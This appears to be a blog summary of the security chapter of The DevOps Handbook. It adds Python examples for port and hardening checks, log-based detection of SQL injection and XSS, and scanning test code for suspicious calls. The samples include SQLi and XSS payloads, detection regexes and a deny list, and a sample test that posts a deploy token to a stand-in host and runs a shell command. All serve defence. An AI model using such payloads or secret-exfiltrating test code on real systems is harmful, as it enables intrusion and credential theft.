DevOps Handbook Summary 4 of 4 - Security

Book summary of The DevOps Handbook by Gene Kim et al. Excerpted content is formatted in italics.

Part VI: The Technical Practices of Integrating Information Security, Change Management, and Compliance

The DevOps goal is to make security a part of everyone's job. We'll look for opportunities to augment our controls with auditable automation. This automation will minimize the need for separation of duties and change approvals that unnecessarily impede the value chain. Once automated and baked into everyone's daily work, the controls are less variable, more auditable, and significantly stronger than the manual controls they replace. Some critical controls will remain manual.

We do this by:
  • Making security a part of everyone’s job 
  • Integrating preventative controls into our shared source code repository 
  • Integrating security with our deployment pipeline 
  • Integrating security with our telemetry to better enable detection and recovery 
  • Protecting our deployment pipeline 
  • Integrating our deployment activities with our change approval processes 
  • Reducing reliance on separation of duty

Information security as everyone's job every day

Integrate security:
  • Into development iteration demos - this means security items are their own stories or are acceptance criteria of all relevant stories
  • Into defect tracking and post-mortems - security defects should be tracked with all other defects, and security incidents, as well as the security implications of any incident, are subject to post-mortem reviews
We must concern ourselves not only with application and data center security but with end-to-end value chain security.

Like all of our code, be it application, infrastructure, or operations code, security capabilities reside in our shared code repository, making them easy to find, understand and use. We may include items such as:
  • Code libraries and their recommended configurations (e.g., 2FA [two-factor authentication library], bcrypt password hashing, logging) 
  • Secret management (e.g., connection settings, encryption keys) using tools such as Vault, sneaker, Keywhiz, credstash, Trousseau, Red October, etc. 
  • OS packages and builds (e.g., NTP for time syncing, secure versions of OpenSSL with correct configurations, OSSEC or Tripwire for file integrity monitoring, syslog configuration to ensure logging of critical security into our centralized ELK stack)

Next we'll integrate security into our development pipelines by including as many automated security tests as we can to run with all our other automated tests. 

Tools such as Gauntlt have been designed to integrate into the deployment pipelines, which run automated security tests on our applications, our application dependencies, our environment, etc. Remarkably, Gauntlt even puts all its security tests in Gherkin syntax test scripts, which is widely used by developers for unit and functional testing. Doing this puts security testing in a framework they are likely already familiar with. This also allows security tests to easily run in a deployment pipeline on every committed change, such as static code analysis, checking for vulnerable dependencies, or dynamic testing.


Ensure security of the application

Developers, often focused on happy path tests of correctness, will need security training to ensure use of sad or bad path automated tests and tools such as:
  1. Static analysis tools - Brakeman and Code Climate
  2. Dynamic analysis - focuses on run time behavior. Tools include Arachni, OWASP ZAP, Nmap and Metasploit
  3. Dependency scanning - for malicious or vulnerable binaries
  4. Source code integrity and signing - all developers are identified and use a security key (e.g. PGP), and all packages generated by continuous integration should be signed and inventoried for auditability.

Ensure the security of our environments

In this step, we should do whatever is required to help ensure that the environments are in a hardened, risk-reduced state. Although we may have created known, good configurations already, we must put in monitoring controls to ensure that all production instances match these known good states. 

We do this by generating automated tests to ensure that all appropriate settings have been correctly applied for configuration hardening, database security settings, key lengths, and so forth. Furthermore, we will use tests to scan our environments for known vulnerabilities.

Another category of security verification is understanding actual environments (i.e., “as they actually are”). Examples of tools for this include Nmap to ensure that only expected ports are open and Metasploit to ensure that we’ve adequately hardened our environments against known vulnerabilities, such as scanning with SQL injection attacks. The output of these tools should be put into our artifact repository and compared with the previous version as part of our functional testing process. Doing this will help us detect any undesirable changes as soon as they occur.
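As an added illustration of the two checks described above (assert that the environment matches its known-good hardening settings, and compare the "as it actually is" scan output against the previous run kept in the artifact repository), here is a small Python stage you could drop into a pipeline. It is example code written for this summary, not code from the book or from Nmap or Metasploit; the scan text, the baseline, the policy keys and the observed settings are all constructed sample data, and the key names are assumptions rather than any tool's real output format.

```python
import re

# Constructed nmap-style port table for one host, standing in for the scan
# the pipeline just produced (not real scan output).
CURRENT_SCAN = """\
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  open     https
3306/tcp open     mysql
8080/tcp filtered http-proxy
"""

# Constructed baseline: the open-port set recorded by the previous run and
# kept in the artifact repository alongside the build.
BASELINE_OPEN_PORTS = {"22/tcp", "80/tcp", "443/tcp"}

# Constructed hardening policy and observed settings. The key names are
# assumptions for this example, not the output format of any real tool.
POLICY = {
    "ssh.permit_root_login": ("eq", "no"),
    "ssh.password_authentication": ("eq", "no"),
    "tls.min_version": ("eq", "1.2"),
    "tls.rsa_key_bits": ("ge", 2048),
    "db.require_ssl": ("eq", True),
}
OBSERVED = {
    "ssh.permit_root_login": "no",
    "ssh.password_authentication": "yes",
    "tls.min_version": "1.2",
    "tls.rsa_key_bits": 1024,
    "db.require_ssl": True,
}

PORT_LINE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)", re.M)


def parse_open_ports(scan_text: str) -> set[str]:
    """Return every 'port/proto' the scan reports as open."""
    return {port for port, state, _service in PORT_LINE.findall(scan_text)
            if state == "open"}


def diff_ports(current: set[str], baseline: set[str]) -> dict[str, list[str]]:
    """Compare observed open ports with the stored baseline. A newly open port
    is exactly the undesirable change the book wants caught on the next run."""
    return {
        "unexpected_open": sorted(current - baseline),
        "missing_from_baseline": sorted(baseline - current),
    }


def check_hardening(observed: dict, policy: dict) -> list[str]:
    """Return one finding per setting that is absent or violates the policy."""
    findings = []
    for key, (op, expected) in policy.items():
        actual = observed.get(key)
        if actual is None:
            findings.append(f"{key}: not set (expected {expected!r})")
        elif op == "eq" and actual != expected:
            findings.append(f"{key}: {actual!r} (expected {expected!r})")
        elif op == "ge" and not (isinstance(actual, (int, float)) and actual >= expected):
            findings.append(f"{key}: {actual!r} (expected >= {expected!r})")
    return findings


def verify_environment(scan_text: str, baseline: set[str],
                       observed: dict, policy: dict) -> dict:
    """Run both checks and report a single pass/fail for the pipeline stage."""
    port_diff = diff_ports(parse_open_ports(scan_text), baseline)
    findings = check_hardening(observed, policy)
    return {
        "ports": port_diff,
        "hardening": findings,
        "passed": not port_diff["unexpected_open"] and not findings,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(verify_environment(CURRENT_SCAN, BASELINE_OPEN_PORTS,
                                        OBSERVED, POLICY), indent=2))
```

Run against the sample data, the stage fails: port 3306/tcp is open but absent from the baseline, password authentication is still enabled for SSH, and the RSA key is shorter than policy allows. A port that was in the baseline but is no longer open is reported separately rather than failing the build, since that is usually a deliberate hardening step that should update the baseline.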

Incorporate security into telemetry

Environmental examples:
  • OS changes (e.g., in production, in our build infrastructure) 
  • Security group changes 
  • Changes to configurations (e.g., OSSEC, Puppet, Chef, Tripwire) 
  • Cloud infrastructure changes (e.g., VPC, security groups, users and privileges) 
  • XSS attempts (i.e., “cross-site scripting attacks”) 
  • SQLi attempts (i.e., “SQL injection attacks”) 
  • Web server errors (e.g., 4XX and 5XX errors)
Application examples:
  • Successful and unsuccessful user logins 
  • User password resets 
  • User email address resets
  • User credit card changes
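To make the two telemetry lists above concrete, here is an added Python example (written for this summary, not code from the book) that runs detection logic over a few constructed log lines. The web-server lines use a common-log-style layout and the application events use an assumed key=value layout; both are sample data, and the alert thresholds are assumptions. It counts the environmental signals (4XX/5XX errors, XSS and SQLi attempts) and the application signals (login outcomes, password and email resets, card changes) so that they can be graphed and alerted on alongside the rest of the telemetry.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed web-server access-log lines (common log layout, not real traffic).
ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products?id=42 HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /products?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 88
10.0.0.5 - - [10/Oct/2023:13:55:42 +0000] "GET /missing HTTP/1.1" 404 0
10.0.0.5 - - [10/Oct/2023:13:55:43 +0000] "POST /login HTTP/1.1" 200 10
"""

# Constructed application events in an assumed key=value layout.
APP_LOG = """\
2023-10-10T13:55:43Z event=login user=alice result=success
2023-10-10T13:55:44Z event=login user=bob result=failure
2023-10-10T13:55:45Z event=login user=bob result=failure
2023-10-10T13:55:46Z event=password_reset user=bob
2023-10-10T13:55:47Z event=email_change user=carol
2023-10-10T13:55:48Z event=card_change user=carol
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
APP_RE = re.compile(
    r'^\S+ event=(?P<event>\S+) user=(?P<user>\S+)(?: result=(?P<result>\S+))?')

# Coarse signatures for the obvious probes: enough to count and alert on.
# A WAF or IDS carries the fuller rule set; this is the telemetry hook.
SQLI_RE = re.compile(r"""['"]\s*(?:or|and)\s+['"]?\d|union\s+select|;\s*drop\s+table""", re.I)
XSS_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)


def classify_request(path: str) -> set[str]:
    """Tag a request path with the attack classes its decoded query resembles."""
    decoded = unquote_plus(path)   # signatures must see the decoded form
    tags = set()
    if SQLI_RE.search(decoded):
        tags.add("sqli_attempt")
    if XSS_RE.search(decoded):
        tags.add("xss_attempt")
    return tags


def summarize_access_log(text: str) -> Counter:
    """Count environmental security signals: error classes and probe attempts."""
    counts: Counter = Counter()
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            counts["unparsed"] += 1   # unparsed lines are themselves a signal
            continue
        status = int(m["status"])
        if 400 <= status < 500:
            counts["http_4xx"] += 1
        elif status >= 500:
            counts["http_5xx"] += 1
        for tag in classify_request(m["path"]):
            counts[tag] += 1
    return counts


def summarize_app_log(text: str) -> Counter:
    """Count application security signals: logins, resets, account changes."""
    counts: Counter = Counter()
    for line in text.splitlines():
        m = APP_RE.match(line)
        if not m:
            counts["unparsed"] += 1
            continue
        if m["event"] == "login":
            counts["login_success" if m["result"] == "success" else "login_failure"] += 1
        else:
            counts[m["event"]] += 1
    return counts


def alerts(access: Counter, app: Counter, failed_login_threshold: int = 2) -> list[str]:
    """Turn the counters into the alerts an on-call engineer would be paged on.
    The threshold is an assumption for this example."""
    out = []
    for tag in ("sqli_attempt", "xss_attempt"):
        if access[tag]:
            out.append(f"{access[tag]} {tag} request(s) seen")
    if app["login_failure"] >= failed_login_threshold:
        out.append(f"{app['login_failure']} failed logins (threshold {failed_login_threshold})")
    return out


if __name__ == "__main__":
    access, app = summarize_access_log(ACCESS_LOG), summarize_app_log(APP_LOG)
    print(dict(access), dict(app), alerts(access, app), sep="\n")
```

The point of sending these counters into the same telemetry as everything else is the one the book makes: an SQLi probe that coincides with a spike in 5XX errors, or a burst of failed logins followed by password resets, is visible to the people already watching the dashboards, not only to a separate security team.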

Protect our development pipeline

Example countermeasures:
  • Hardening continuous build and integration servers and ensuring we can reproduce them in an automated manner
  • Reviewing all changes introduced into version control
  • Instrumenting our repository to detect when test code contains suspicious API calls 
  • Ensuring every CI process runs on its own isolated container or VM 
  • Ensuring the version control credentials used by the CI system are read-only
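The third countermeasure above, instrumenting the repository to detect test code that makes suspicious API calls, is also a small instance of the static analysis listed earlier under "Ensure security of the application". As an added example (written for this summary, not code from the book or from any of the tools it names), here is a Python check that walks the syntax tree of a test file, resolves import aliases, and flags imports and calls a unit test has no business making. The module and call lists are an assumed policy to be tuned per code base, and the test file it scans is constructed sample input.

```python
import ast

# Policy for this example (an assumption, tune to your code base): modules a
# unit or functional test should have no reason to touch, and individual calls
# that spawn processes or evaluate code.
SUSPICIOUS_MODULES = {"subprocess", "socket", "ctypes", "urllib.request",
                      "requests", "paramiko"}
SUSPICIOUS_CALLS = {"os.system", "os.popen", "os.execv", "eval", "exec"}

# Constructed test file (not from any real project). One test is benign, the
# other reaches for the network and a shell from inside the CI sandbox.
SAMPLE_TEST = '''\
import os
import socket
from subprocess import run
import requests as rq

def test_add():
    assert 1 + 1 == 2

def test_reaches_out():
    token = os.environ.get("DEPLOY_TOKEN")
    rq.post("http://example.invalid/collect", data=token)
    os.system("id")
'''


def _in_suspicious_module(name: str) -> bool:
    return any(name == m or name.startswith(m + ".") for m in SUSPICIOUS_MODULES)


class SuspiciousCallFinder(ast.NodeVisitor):
    """Resolve import aliases so that `rq.post` is judged as `requests.post`."""

    def __init__(self) -> None:
        self.aliases: dict[str, str] = {}   # local name -> qualified name
        self.findings: list[str] = []

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            if a.asname:
                self.aliases[a.asname] = a.name
            else:
                top = a.name.split(".")[0]   # `import urllib.request` binds `urllib`
                self.aliases[top] = top
            if _in_suspicious_module(a.name):
                self.findings.append(f"line {node.lineno}: import {a.name}")
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        module = node.module or ""
        for a in node.names:
            self.aliases[a.asname or a.name] = f"{module}.{a.name}"
        if _in_suspicious_module(module):
            self.findings.append(f"line {node.lineno}: import {module}")
        self.generic_visit(node)

    def _qualified(self, node: ast.AST):
        """Turn `a.b.c` into a dotted name with the alias of `a` expanded."""
        parts = []
        while isinstance(node, ast.Attribute):
            parts.append(node.attr)
            node = node.value
        if not isinstance(node, ast.Name):
            return None                      # e.g. a call on a call result
        parts.append(self.aliases.get(node.id, node.id))
        return ".".join(reversed(parts))

    def visit_Call(self, node: ast.Call) -> None:
        name = self._qualified(node.func)
        if name and (name in SUSPICIOUS_CALLS or _in_suspicious_module(name)):
            self.findings.append(f"line {node.lineno}: call {name}")
        self.generic_visit(node)


def scan_test_source(source: str) -> list[str]:
    """Return every suspicious import or call found in one test file's source."""
    finder = SuspiciousCallFinder()
    finder.visit(ast.parse(source))
    return finder.findings


def gate_test_code(source: str) -> bool:
    """The pipeline gate: block the change when the scan reports anything."""
    return not scan_test_source(source)


if __name__ == "__main__":
    for finding in scan_test_source(SAMPLE_TEST):
        print(finding)
    print("clean" if gate_test_code(SAMPLE_TEST) else "blocked")
```

Wired into the repository as a pre-merge check, this complements the other countermeasures in the list: even if a test that shells out or talks to the network does get merged, running each CI job in its own isolated container with read-only version-control credentials limits what it can reach.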

Protect our deployment pipeline

Integrate security and compliance into the change approval processes

Change management processes typically address three types of changes:
  • Standard - low risk, maybe pre-approved
  • Normal - higher risk, typically requiring multiple party review
  • Urgent - high risk, often requiring executive approvals
Our goal is to demonstrate that, as a result of all of the automated and manual controls we have in place, a large majority of changes are standard changes and, similarly, that many urgent changes may be treated as normal changes.

Reduce reliance on separation of duty controls

When we did production deployments less frequently (e.g., annually) and when our work was less complex, compartmentalizing our work and doing hand-offs were tenable ways of conducting business. However, as complexity and deployment frequency increase, performing production deployments successfully increasingly requires everyone in the value stream to quickly see the outcomes of their actions. 

Separation of duty often can impede this by slowing down and reducing the feedback engineers receive on their work. This prevents engineers from taking full responsibility for the quality of their work and reduces a firm’s ability to create organizational learning. 

Consequently, wherever possible, we should avoid using separation of duties as a control. Instead, we should choose controls such as pair programming, continuous inspection of code check-ins, and code review. These controls can give us the necessary reassurance about the quality of our work. Furthermore, by putting these controls in place, if separation of duties is required, we can show that we achieve equivalent outcomes with the controls we have created.

To accomplish this we need to ensure we have documentation and proof for auditors and compliance officers.

As technology organizations increasingly adopt DevOps patterns, there is more tension than ever between IT and audit. These new DevOps patterns challenge traditional thinking about auditing, controls, and risk mitigation. 

As Bill Shinn, a principal security solutions architect at Amazon Web Services, observes, “DevOps is all about bridging the gap between Dev and Ops. In some ways, the challenge of bridging the gap between DevOps and auditors and compliance officers is even larger. For instance, how many auditors can read code and how many developers have read NIST 800-37 or the Gramm-Leach-Bliley Act? That creates a gap of knowledge, and the DevOps community needs to help bridge that gap.”
